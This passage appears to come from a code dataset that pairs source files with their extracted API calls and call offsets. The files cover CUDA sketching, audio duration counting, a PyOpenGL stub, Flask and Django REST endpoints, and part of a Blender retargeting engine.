int b[3] = {609478, 2949676, 2171464};
for(int idx = 0; idx < 3; ++idx)
{
const int hash_idx = idx*W + hash(index, N, a[idx], b[idx]) * D + threadIdx.x;
float old_value = mem[hash_idx];
float update = (1. - beta) * (value - old_value);
atomicAdd(&mem[hash_idx], update);
r[idx] = old_value + update;
}
return minimum(r[0], r[1], r[2]);
}
extern "C"
__global__
void cms_hash_update_retrieve(const long* indices,
const float* values,
const float* beta,
float* mem,
float* result,
const int N,
const int W,
const int D)
{
if(threadIdx.x < D)
{
const int idx = blockIdx.x * D + threadIdx.x;
const float value = values[idx];
const long index = indices[blockIdx.x];
result[idx] = cms_update_retrieve(mem, result, *beta, N, W, D, index, value);
}
}
'''
class CountMinSketch:
def __init__(self, N, D, sketch_size=0.20):
self.N = N
self.D = D
self.blk_size = math.ceil(D // 32) * 32
self.range = int(N*sketch_size/3.)
self.width = self.range * D
self.kernel = cupyKernel(kernel, "cms_hash_update_retrieve")
self.cms = torch.zeros(3, self.range, D).float().cuda()
print(N, "CMS", self.cms.size())
def update(self, indices, values, size, beta):
M, D = values.size()
result = torch.zeros(values.size()).float().cuda()
beta = torch.FloatTensor([beta]).cuda()
self.kernel(grid=(M,1,1),
block=(self.blk_size,1,1),
args=[indices.data_ptr(),
values.data_ptr(),
beta.data_ptr(),
self.cms.data_ptr(),
result.data_ptr(),
self.range,
self.width,
self.D],
strm=torch.cuda.current_stream().cuda_stream)
return torch.cuda.sparse.FloatTensor(indices, result, size)
def clean(self, alpha):
self.cms.mul_(alpha)
|
[
"math.ceil",
"torch.FloatTensor",
"torch.zeros",
"torch.cuda.sparse.FloatTensor",
"cupy_kernel.cupyKernel",
"torch.cuda.current_stream"
] |
[((2143, 2189), 'cupy_kernel.cupyKernel', 'cupyKernel', (['kernel', '"""cms_hash_update_retrieve"""'], {}), "(kernel, 'cms_hash_update_retrieve')\n", (2153, 2189), False, 'from cupy_kernel import cupyKernel\n'), ((2935, 2987), 'torch.cuda.sparse.FloatTensor', 'torch.cuda.sparse.FloatTensor', (['indices', 'result', 'size'], {}), '(indices, result, size)\n', (2964, 2987), False, 'import torch\n'), ((2018, 2036), 'math.ceil', 'math.ceil', (['(D // 32)'], {}), '(D // 32)\n', (2027, 2036), False, 'import math\n'), ((2450, 2475), 'torch.FloatTensor', 'torch.FloatTensor', (['[beta]'], {}), '([beta])\n', (2467, 2475), False, 'import torch\n'), ((2879, 2906), 'torch.cuda.current_stream', 'torch.cuda.current_stream', ([], {}), '()\n', (2904, 2906), False, 'import torch\n'), ((2209, 2238), 'torch.zeros', 'torch.zeros', (['(3)', 'self.range', 'D'], {}), '(3, self.range, D)\n', (2220, 2238), False, 'import torch\n')]
|
import argparse
import warnings
import librosa
from tqdm import tqdm
SAMPLE_RATE = 16000
def read_audio_and_text(inputs):
audio_path = inputs['file_path']
audio, sr = librosa.load(audio_path, sr=SAMPLE_RATE, mono=True)
return audio.size / float(sr)
def process_line(args, line):
filename, language, text = line.split(args.delimiter)
inputs = {
'file_path': filename,
'text': text.strip(),
'language': language
}
try:
return read_audio_and_text(inputs)
except Exception as err:
print(str(err))
return 0
def main(args):
with open(args.input_file) as f:
total = 0
for x in tqdm(f):
total += process_line(args, x)
total /= 3600
print('Hours: ', total)
if __name__ == '__main__':
warnings.simplefilter(action='ignore', category=FutureWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', help='File with audio paths and texts.', required=True)
parser.add_argument('--step', help='Analysis window step in ms.', type=int, default=10)
parser.add_argument('--start', help='Index of example to start from', type=int, default=0)
parser.add_argument('--delimiter', help='CSV delimiter', type=str, default=',')
main(parser.parse_args())
|
[
"tqdm.tqdm",
"librosa.load",
"warnings.simplefilter",
"argparse.ArgumentParser"
] |
[((179, 230), 'librosa.load', 'librosa.load', (['audio_path'], {'sr': 'SAMPLE_RATE', 'mono': '(True)'}), '(audio_path, sr=SAMPLE_RATE, mono=True)\n', (191, 230), False, 'import librosa\n'), ((817, 879), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'FutureWarning'}), "(action='ignore', category=FutureWarning)\n", (838, 879), False, 'import warnings\n'), ((894, 919), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (917, 919), False, 'import argparse\n'), ((678, 685), 'tqdm.tqdm', 'tqdm', (['f'], {}), '(f)\n', (682, 685), False, 'from tqdm import tqdm\n')]
|
'''OpenGL extension SUN.convolution_border_modes
Automatically generated by the get_gl_extensions script, do not edit!
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_SUN_convolution_border_modes'
_DEPRECATED = False
GL_WRAP_BORDER_SUN = constant.Constant( 'GL_WRAP_BORDER_SUN', 0x81D4 )
def glInitConvolutionBorderModesSUN():
'''Return boolean indicating whether this extension is available'''
return extensions.hasGLExtension( EXTENSION_NAME )
|
[
"OpenGL.constant.Constant",
"OpenGL.extensions.hasGLExtension"
] |
[((345, 391), 'OpenGL.constant.Constant', 'constant.Constant', (['"""GL_WRAP_BORDER_SUN"""', '(33236)'], {}), "('GL_WRAP_BORDER_SUN', 33236)\n", (362, 391), False, 'from OpenGL import platform, constants, constant, arrays\n'), ((519, 560), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['EXTENSION_NAME'], {}), '(EXTENSION_NAME)\n', (544, 560), False, 'from OpenGL import extensions\n')]
|
from datetime import datetime, timedelta
from random import shuffle
from flask import request
from flask_restful import Resource, abort
from sqlalchemy.sql.expression import func
from backend.model.project import FluencyProject
from backend.model.result import FluencyResultSchema, FluencyResult
from backend.model.project_status import ProjectStatus, ProjectStatusSchema
from backend.model import ma, db
from backend.model.summary import SummarySchema, SanitySummarySchema, \
Summary, SanitySummary, SummaryGroup, SummaryGroupList
class ResSumObj(object):
def __init__(self, result, summary):
self.result = result
self.summary = summary
class ResSumSchema(ma.Schema):
result = ma.Nested(FluencyResultSchema)
summary = ma.Nested(SummarySchema)
class FluencyObj(object):
def __init__(self, res_sums, sanity_summ, proj_status):
self.res_sums = res_sums
self.sanity_summ = sanity_summ
self.proj_status = proj_status
class FluencySchema(ma.Schema):
res_sums = ma.Nested(ResSumSchema, many=True)
sanity_summ = ma.Nested(SanitySummarySchema)
proj_status = ma.Nested(ProjectStatusSchema)
class FluencyResource(Resource):
def post(self):
data = request.get_json()
old_results = []
# print(data['results'])
for result in data['results']:
old_result = FluencyResult.query.get(result['id'])
old_result.fluency = result['fluency']
old_results.append(old_result)
proj_status = ProjectStatus.query.get(data['proj_status']['id'])
proj_status.validity = data['proj_status']['validity']
proj_status.is_finished = data['proj_status']['is_finished']
proj_status.is_active = data['proj_status']['is_active']
proj_status.good_summ_score = data['proj_status']['good_summ_score']
proj_status.mediocre_summ_score = data['proj_status']['mediocre_summ_score']
proj_status.bad_summ_score = data['proj_status']['bad_summ_score']
proj_status.sanity_summ_id = data['proj_status']['sanity_summ_id']
if not proj_status.validity:
# Recreate results
results = []
for result in data['results']:
new_result = FluencyResult(
summary_id=result['summary_id'],
proj_status_id=result['proj_status_id'])
results.append(new_result)
db.session.bulk_save_objects(results)
# Invalidate old results
for old_result in old_results:
old_result.is_invalid = True
db.session.commit()
def get(self, project_id):
project = FluencyProject.query.get(project_id)
if project is None:
return abort(404, message=f"Fluency project {project_id} not found")
else:
# Get one unfinished project_status
current_time = datetime.utcnow()
proj_status = ProjectStatus.query\
.filter_by(fluency_proj_id=project.id,
is_finished=False, is_active=False)\
.order_by(func.rand())\
.first()
if proj_status is None:
proj_status = ProjectStatus.query \
.filter_by(fluency_proj_id=project.id, is_finished=False)\
.filter(ProjectStatus.expired_in < current_time)\
.order_by(func.rand())\
.first()
if proj_status is None:
return abort(404, message=f"No project status is opened.")
# Get related results
results = FluencyResult.query\
.filter_by(proj_status_id=proj_status.id, is_invalid=False)\
.all()
res_sums = []
for result in results:
summary = Summary.query.get(result.summary_id)
res_sums.append(ResSumObj(result=result, summary=summary))
# Get random sanity summaries
# The function rand() is specific to MySql only (https://stackoverflow.com/q/60805)
sanity_summ = SanitySummary.query.order_by(func.rand()).first()
fluency = FluencyObj(
res_sums=res_sums,
sanity_summ=sanity_summ,
proj_status=proj_status)
# Change project status attribute before sending
proj_status.is_active = True
proj_status.expired_in = datetime.utcnow() + timedelta(minutes=project.expire_duration)
db.session.commit()
return FluencySchema().dump(fluency)
|
[
"sqlalchemy.sql.expression.func.rand",
"backend.model.project_status.ProjectStatus.query.get",
"flask_restful.abort",
"backend.model.summary.Summary.query.get",
"backend.model.project_status.ProjectStatus.query.filter_by",
"datetime.datetime.utcnow",
"flask.request.get_json",
"backend.model.ma.Nested",
"backend.model.db.session.bulk_save_objects",
"datetime.timedelta",
"backend.model.db.session.commit",
"backend.model.result.FluencyResult",
"backend.model.result.FluencyResult.query.get",
"backend.model.result.FluencyResult.query.filter_by",
"backend.model.project.FluencyProject.query.get"
] |
[((712, 742), 'backend.model.ma.Nested', 'ma.Nested', (['FluencyResultSchema'], {}), '(FluencyResultSchema)\n', (721, 742), False, 'from backend.model import ma, db\n'), ((757, 781), 'backend.model.ma.Nested', 'ma.Nested', (['SummarySchema'], {}), '(SummarySchema)\n', (766, 781), False, 'from backend.model import ma, db\n'), ((1030, 1064), 'backend.model.ma.Nested', 'ma.Nested', (['ResSumSchema'], {'many': '(True)'}), '(ResSumSchema, many=True)\n', (1039, 1064), False, 'from backend.model import ma, db\n'), ((1083, 1113), 'backend.model.ma.Nested', 'ma.Nested', (['SanitySummarySchema'], {}), '(SanitySummarySchema)\n', (1092, 1113), False, 'from backend.model import ma, db\n'), ((1132, 1162), 'backend.model.ma.Nested', 'ma.Nested', (['ProjectStatusSchema'], {}), '(ProjectStatusSchema)\n', (1141, 1162), False, 'from backend.model import ma, db\n'), ((1234, 1252), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1250, 1252), False, 'from flask import request\n'), ((1529, 1579), 'backend.model.project_status.ProjectStatus.query.get', 'ProjectStatus.query.get', (["data['proj_status']['id']"], {}), "(data['proj_status']['id'])\n", (1552, 1579), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n'), ((2609, 2628), 'backend.model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2626, 2628), False, 'from backend.model import ma, db\n'), ((2679, 2715), 'backend.model.project.FluencyProject.query.get', 'FluencyProject.query.get', (['project_id'], {}), '(project_id)\n', (2703, 2715), False, 'from backend.model.project import FluencyProject\n'), ((1375, 1412), 'backend.model.result.FluencyResult.query.get', 'FluencyResult.query.get', (["result['id']"], {}), "(result['id'])\n", (1398, 1412), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((2438, 2475), 'backend.model.db.session.bulk_save_objects', 'db.session.bulk_save_objects', (['results'], {}), '(results)\n', (2466, 2475), False, 'from backend.model import ma, db\n'), ((2763, 2824), 'flask_restful.abort', 'abort', (['(404)'], {'message': 'f"""Fluency project {project_id} not found"""'}), "(404, message=f'Fluency project {project_id} not found')\n", (2768, 2824), False, 'from flask_restful import Resource, abort\n'), ((2914, 2931), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2929, 2931), False, 'from datetime import datetime, timedelta\n'), ((4542, 4561), 'backend.model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4559, 4561), False, 'from backend.model import ma, db\n'), ((2254, 2346), 'backend.model.result.FluencyResult', 'FluencyResult', ([], {'summary_id': "result['summary_id']", 'proj_status_id': "result['proj_status_id']"}), "(summary_id=result['summary_id'], proj_status_id=result[\n 'proj_status_id'])\n", (2267, 2346), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((3532, 3583), 'flask_restful.abort', 'abort', (['(404)'], {'message': 'f"""No project status is opened."""'}), "(404, message=f'No project status is opened.')\n", (3537, 3583), False, 'from flask_restful import Resource, abort\n'), ((3849, 3885), 'backend.model.summary.Summary.query.get', 'Summary.query.get', (['result.summary_id'], {}), '(result.summary_id)\n', (3866, 3885), False, 'from backend.model.summary import SummarySchema, SanitySummarySchema, Summary, SanitySummary, SummaryGroup, SummaryGroupList\n'), ((4467, 4484), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4482, 4484), False, 'from datetime import datetime, timedelta\n'), ((4487, 4529), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'project.expire_duration'}), '(minutes=project.expire_duration)\n', (4496, 4529), False, 'from datetime import datetime, timedelta\n'), ((3640, 3718), 'backend.model.result.FluencyResult.query.filter_by', 'FluencyResult.query.filter_by', ([], {'proj_status_id': 'proj_status.id', 'is_invalid': '(False)'}), '(proj_status_id=proj_status.id, is_invalid=False)\n', (3669, 3718), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((3124, 3135), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (3133, 3135), False, 'from sqlalchemy.sql.expression import func\n'), ((4155, 4166), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (4164, 4166), False, 'from sqlalchemy.sql.expression import func\n'), ((2958, 3055), 'backend.model.project_status.ProjectStatus.query.filter_by', 'ProjectStatus.query.filter_by', ([], {'fluency_proj_id': 'project.id', 'is_finished': '(False)', 'is_active': '(False)'}), '(fluency_proj_id=project.id, is_finished=False,\n is_active=False)\n', (2987, 3055), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n'), ((3430, 3441), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (3439, 3441), False, 'from sqlalchemy.sql.expression import func\n'), ((3229, 3305), 'backend.model.project_status.ProjectStatus.query.filter_by', 'ProjectStatus.query.filter_by', ([], {'fluency_proj_id': 'project.id', 'is_finished': '(False)'}), '(fluency_proj_id=project.id, is_finished=False)\n', (3258, 3305), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n')]
|
from datetime import datetime
from itertools import chain
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import User, Character
from .serializers import *
from rest_framework import generics
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework import status
from rest_framework.decorators import api_view, permission_classes
@permission_classes([IsAuthenticated])
class CharacterCreateAPIView(generics.CreateAPIView):
serializer_class = CharacterCreateSerializer
queryset = Character.objects.all()
@permission_classes([IsAuthenticated])
class CharacterListAPIView(generics.ListAPIView):
serializer_class = CharacterPublicSerializer
model = Character
queryset = Character.objects.all()
@permission_classes([IsAuthenticated])
class UserListAPIView(generics.ListAPIView):
serializer_class = UserSerializer
queryset = User.objects.all()
@permission_classes([IsAuthenticated])
class EventListAPIView(generics.ListAPIView):
serializer_class = EventSerializer
queryset = Event.objects.all()
model = Event
def get_queryset(self):
date = self.request.GET.get('date')
if date:
try:
date_time_obj = datetime.strptime(date, '%d.%m.%Y %H:%M:%S')
queryset = self.queryset.filter(period="d")
queryset_week2 = self.queryset.filter(period="w")\
.filter(period_across=2)\
.filter(period_parity=date_time_obj.timetuple().tm_yday // 7 % 2)\
.filter(start_date__iso_week_day=date_time_obj.weekday())
queryset_week1 = self.queryset.filter(period="w")\
.filter(period_across=1)\
.filter(start_date__iso_week_day=date_time_obj.isoweekday())
queryset = list(chain(queryset, queryset_week1, queryset_week2))
except ValueError:
queryset = self.model.objects.none()
return queryset
return self.model.objects.all()
@permission_classes([IsAuthenticated])
class UserAPIView(generics.ListAPIView):
model = User
serializer_class = UserSerializer
queryset = model.objects.all()
def get_queryset(self):
username = self.request.GET.get('username')
if not username:
username = self.request.user.username
if username:
try:
queryset = self.queryset.filter(username=username)
except ValueError:
queryset = self.model.objects.none()
return queryset
return self.model.objects.none()
@staticmethod
def patch(request):
user = request.user
serializer = UserUpdateSerializer(user, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response(status=status.HTTP_201_CREATED, data=serializer.data)
return Response(status=status.HTTP_400_BAD_REQUEST, data="wrong parameters")
@permission_classes([IsAuthenticated])
class UserCharactersAPIView(generics.ListAPIView):
serializer_class = UserCharactersSerializer
queryset = User.objects.all()
def get_queryset(self):
username = self.request.GET.get('username')
if username:
try:
queryset = self.queryset.filter(username=username)
except ValueError:
queryset = self.User.objects.none()
return queryset
return self.User.objects.none()
@permission_classes([IsAuthenticated])
class CharacterEventsAPIView(generics.ListAPIView):
serializer_class = CharacterEventsSerializer
queryset = Character.objects.all()
def get_queryset(self):
nickname = self.request.GET.get('nickname')
if nickname:
try:
queryset = self.queryset.filter(nickname=nickname)
except ValueError:
queryset = self.Character.objects.none()
return queryset
return self.Character.objects.none()
@permission_classes([IsAuthenticated])
class UserCharacterEventsAPIView(generics.ListAPIView):
serializer_class = CharacterOwnerSerializer
queryset = CharacterOwner.objects.all()
def list(self, request):
date = self.request.GET.get('date')
inner_character_event = CharacterEvent.objects.filter(date=date)
inner_character = Character.objects.filter(character_events__in=inner_character_event)
queryset = CharacterOwner.objects.filter(owner=request.user).filter(character__in=inner_character)
serializer = UserCharacterEventsSerializer(queryset, many=True)
return Response(serializer.data)
@permission_classes([IsAuthenticated])
class CharacterEventsCountAPIView(generics.ListAPIView):
serializer_class = CharacterEventsCountSerializer
queryset = Character.objects.all()
def get_queryset(self):
nickname = self.request.GET.get('nickname')
if nickname:
try:
queryset = self.queryset.filter(nickname=nickname)
except ValueError:
queryset = self.Character.objects.none()
return queryset
return self.Character.objects.none()
@permission_classes([IsAuthenticated])
class CharacterOwnersListAPIView(generics.ListAPIView):
serializer_class = CharacterOwnerSerializer
queryset = CharacterOwner.objects.all()
@permission_classes([IsAuthenticated])
class CharacterEventsListAPIView(generics.ListAPIView):
serializer_class = CharacterEventSerializer
queryset = CharacterEvent.objects.all()
|
[
"rest_framework.decorators.permission_classes",
"datetime.datetime.strptime",
"rest_framework.response.Response",
"itertools.chain"
] |
[((416, 453), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (434, 453), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((599, 636), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (617, 636), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((800, 837), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (818, 837), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((958, 995), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (976, 995), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((2086, 2123), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (2104, 2123), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((3055, 3092), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (3073, 3092), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((3566, 3603), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (3584, 3603), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((4094, 4131), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (4112, 4131), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((4745, 4782), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (4763, 4782), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((5283, 5320), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (5301, 5320), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((5472, 5509), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (5490, 5509), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((2982, 3051), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_400_BAD_REQUEST', 'data': '"""wrong parameters"""'}), "(status=status.HTTP_400_BAD_REQUEST, data='wrong parameters')\n", (2990, 3051), False, 'from rest_framework.response import Response\n'), ((4716, 4741), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (4724, 4741), False, 'from rest_framework.response import Response\n'), ((2904, 2966), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_201_CREATED', 'data': 'serializer.data'}), '(status=status.HTTP_201_CREATED, data=serializer.data)\n', (2912, 2966), False, 'from rest_framework.response import Response\n'), ((1273, 1317), 'datetime.datetime.strptime', 'datetime.strptime', (['date', '"""%d.%m.%Y %H:%M:%S"""'], {}), "(date, '%d.%m.%Y %H:%M:%S')\n", (1290, 1317), False, 'from datetime import datetime\n'), ((1882, 1929), 'itertools.chain', 'chain', (['queryset', 'queryset_week1', 'queryset_week2'], {}), '(queryset, queryset_week1, queryset_week2)\n', (1887, 1929), False, 'from itertools import chain\n')]
|
# MB-Lab
#
# Сайт ветки MB-Lab: https://github.com/animate1978/MB-Lab
# Сайт ветки перевода на русский язык MB-Lab: https://github.com/SergeyRom-23/MB-Lab-master-RU
#
# ##### НАЧАЛО ЛИЦЕНЗИОННОГО БЛОКА GPL #####
#
# Эта программа является свободным программным обеспечением; Вы можете распространять его и / или
# изменить его в соответствии с условиями GNU General Public License
# как опубликовано Фондом свободного программного обеспечения; либо версия 3
# Лицензии или (по вашему выбору) любой более поздней версии.
#
# Эта программа распространяется в надежде, что она будет полезна,
# но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемой гарантии
# ИЗДЕЛИЯ или ПРИГОДНОСТЬ ДЛЯ ОСОБЫХ ЦЕЛЕЙ. Смотрите
# GNU General Public License для более подробной информации.
#
# Вам надо принять Стандартнуюй общественную лицензию GNU
# вместе с этой программой; если нет, напишите в Фонд свободного программного обеспечения,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### КОНЕЦ ЛИЦЕНЗИОННОГО БЛОКА GPL #####
#
# ManuelbastioniLAB - Авторские права (C) 2015-2018 <NAME>
# Перевод (C) 2019 <NAME> 23
import logging
import os
import json
import time
from functools import lru_cache
import mathutils
import bpy
from . import algorithms
from .utils import get_active_armature
logger = logging.getLogger(__name__)
class RetargetEngine:
def __init__(self):
self.has_data = False
self.femaleposes_exist = False
self.maleposes_exist = False
self.data_path = algorithms.get_data_path()
self.maleposes_path = os.path.join(self.data_path, self.data_path, "poses", "male_poses")
self.femaleposes_path = os.path.join(self.data_path, self.data_path, "poses", "female_poses")
if os.path.isdir(self.maleposes_path):
self.maleposes_exist = True
if os.path.isdir(self.femaleposes_path):
self.femaleposes_exist = True
self.body_name = ""
self.armature_name = ""
self.skeleton_mapped = {}
self.lib_filepath = algorithms.get_blendlibrary_path()
self.knowledge_path = os.path.join(self.data_path, "retarget_knowledge.json")
if os.path.isfile(self.lib_filepath) and os.path.isfile(self.knowledge_path):
self.knowledge_database = algorithms.load_json_data(self.knowledge_path, "Skeleton knowledge data")
self.local_rotation_bones = self.knowledge_database["local_rotation_bones"]
self.last_selected_bone_name = None
self.stored_animations = {}
self.correction_is_sync = True
self.is_animated_bone = ""
self.rot_type = ""
self.has_data = True
else:
logger.critical("Retarget database not found. Please check your Blender addons directory.")
@staticmethod
def get_selected_posebone():
if bpy.context.selected_pose_bones:
if bpy.context.selected_pose_bones:
return bpy.context.selected_pose_bones[0]
return None
def is_editable_bone(self):
armat = get_active_armature()
if armat:
if armat.animation_data:
if armat.animation_data.action:
if self.rot_type in ["EULER", "QUATERNION"]:
self.is_animated_bone = "VALID_BONE"
else:
self.is_animated_bone = "The bone has not anim. data"
else:
self.is_animated_bone = "{0} has not action data".format(armat.name)
else:
self.is_animated_bone = "{0} has not animation data".format(armat.name)
else:
self.is_animated_bone = "No armature selected"
@staticmethod
def get_action(target_armature):
if target_armature and target_armature.animation_data:
return target_armature.animation_data.action
return None
def check_correction_sync(self):
scn = bpy.context.scene
selected_bone = self.get_selected_posebone()
if selected_bone:
if self.last_selected_bone_name != selected_bone.name:
self.get_bone_rot_type()
offsets = self.get_offset_values()
if scn.mblab_rot_offset_0 != offsets[0]:
self.correction_is_sync = False
if scn.mblab_rot_offset_1 != offsets[1]:
self.correction_is_sync = False
if scn.mblab_rot_offset_2 != offsets[2]:
self.correction_is_sync = False
self.is_editable_bone()
self.last_selected_bone_name = selected_bone.name
def get_offset_values(self):
offsets = [0, 0, 0]
for i in (0, 1, 2):
if self.rot_type == "QUATERNION":
channel = i+1
else:
channel = i
armat_name, animation_curve, animation_data_id = self.get_curve_data(channel)
if armat_name in self.stored_animations.keys():
if animation_data_id in self.stored_animations[armat_name].keys():
animation_data = self.stored_animations[armat_name][animation_data_id]
if animation_curve:
if animation_curve.keyframe_points:
offsets[i] = animation_curve.keyframe_points[0].co[1] - animation_data[0]
return offsets
def identify_curve_rot(self, bone):
r_type = "NO_CURVES"
armat = get_active_armature()
if armat:
action = self.get_action(armat)
if action and bone:
d_path1 = f'pose.bones["{bone.name}"].rotation_quaternion'
d_path2 = f'pose.bones["{bone.name}"].rotation_axis_angle'
d_path3 = f'pose.bones["{bone.name}"].rotation_euler'
animation_curve1 = action.fcurves.find(d_path1, index=0)
animation_curve2 = action.fcurves.find(d_path2, index=0)
animation_curve3 = action.fcurves.find(d_path3, index=0)
if animation_curve1:
r_type = "QUATERNION"
if animation_curve2:
r_type = "AXIS_ANGLE"
if animation_curve3:
r_type = "EULER"
return r_type
def get_bone_rot_type(self):
selected_bone = self.get_selected_posebone()
self.rot_type = self.identify_curve_rot(selected_bone)
def get_bone_curve_id(self, selected_bone):
if self.rot_type == "QUATERNION":
return f'pose.bones["{selected_bone.name}"].rotation_quaternion'
if self.rot_type == "EULER":
return f'pose.bones["{selected_bone.name}"].rotation_euler'
return None
def get_curve_data(self, channel):
armat = get_active_armature()
d_path = None
if armat:
action = self.get_action(armat)
if action:
selected_bone = self.get_selected_posebone()
if selected_bone:
d_path = self.get_bone_curve_id(selected_bone)
if d_path:
animation_curve = action.fcurves.find(d_path, index=channel)
animation_data_id = f'{d_path}{str(channel)}'
if animation_curve:
return (armat.name, animation_curve, animation_data_id)
return (None, None, None)
def reset_bones_correction(self):
self.stored_animations = {}
def correct_bone_angle(self, channel, value):
scn = bpy.context.scene
if self.rot_type == "QUATERNION":
channel += 1
armat_name, animation_curve, animation_data_id = self.get_curve_data(channel)
if armat_name and animation_curve and animation_data_id:
if armat_name not in self.stored_animations.keys():
self.stored_animations[armat_name] = {}
if animation_data_id not in self.stored_animations[armat_name].keys():
animation_data = []
for kpoint in animation_curve.keyframe_points:
animation_data.append(kpoint.co[1])
self.stored_animations[armat_name][animation_data_id] = animation_data
else:
animation_data = self.stored_animations[armat_name][animation_data_id]
for i, _ in enumerate(animation_data):
animation_curve.keyframe_points[i].co[1] = animation_data[i] + value
animation_curve.update()
scn.frame_set(scn.frame_current)
def align_bones_z_axis(self, target_armature, source_armature):
armature_z_axis = {}
if target_armature:
if source_armature:
logger.info("Aligning Z axis of %s with Z axis of %s",
target_armature.name, source_armature.name)
algorithms.select_and_change_mode(source_armature, 'EDIT')
for x_bone in target_armature.data.bones:
b_name = x_bone.name
source_bone_name = self.get_mapped_name(b_name)
if source_bone_name is not None:
armature_z_axis[b_name] = source_armature.data.edit_bones[source_bone_name].z_axis.copy()
else:
logger.debug("Bone %s non mapped", b_name)
algorithms.select_and_change_mode(source_armature, 'POSE')
algorithms.select_and_change_mode(target_armature, 'EDIT')
for armat_bone in target_armature.data.edit_bones:
if armat_bone.name in armature_z_axis:
z_axis = armature_z_axis[armat_bone.name]
armat_bone.align_roll(z_axis)
algorithms.select_and_change_mode(target_armature, 'POSE')
def reset_skeleton_mapped(self):
self.skeleton_mapped = {}
def init_skeleton_map(self, source_armat):
self.reset_skeleton_mapped()
self.already_mapped_bones = []
self.spine_bones_names = None
self.rarm_bones_names = None
self.larm_bones_names = None
self.rleg_bones_names = None
self.lleg_bones_names = None
self.head_bones_names = None
self.pelvis_bones_names = None
self.rtoe1_bones_names = None
self.rtoe2_bones_names = None
self.rtoe3_bones_names = None
self.rtoe4_bones_names = None
self.rtoe5_bones_names = None
self.ltoe1_bones_names = None
self.ltoe2_bones_names = None
self.ltoe3_bones_names = None
self.ltoe4_bones_names = None
self.ltoe5_bones_names = None
self.rfinger0_bones_names = None
self.rfinger1_bones_names = None
self.rfinger2_bones_names = None
self.rfinger3_bones_names = None
self.rfinger4_bones_names = None
self.lfinger0_bones_names = None
self.lfinger1_bones_names = None
self.lfinger2_bones_names = None
self.lfinger3_bones_names = None
self.lfinger4_bones_names = None
self.map_main_bones(source_armat)
@staticmethod
def name_combinations(bone_identifiers, side):
combinations = []
if side == 'RIGHT':
side_id = ("r", "right")
junctions = (".", "_", "-", "")
elif side == 'LEFT':
side_id = ("l", "left")
junctions = (".", "_", "-", "")
else:
side_id = [""]
junctions = [""]
for b_id in bone_identifiers:
for s_id in side_id:
for junct in junctions:
combinations.append(f'{b_id}{junct}{s_id}')
combinations.append(f'{s_id}{junct}{b_id}')
return combinations
def get_bone_by_exact_id(self, bones_to_scan, bone_identifiers, side):
if bones_to_scan:
name_combinations = self.name_combinations(bone_identifiers, side)
for b_name in bones_to_scan:
if b_name.lower() in name_combinations:
return b_name
return None
def get_bone_by_childr(self, armat, bones_to_scan, childr_identifiers):
if childr_identifiers:
for bone_name in bones_to_scan:
x_bone = self.get_bone(armat, bone_name)
if not x_bone:
return None
for ch_bone in x_bone.children:
for ch_id in childr_identifiers:
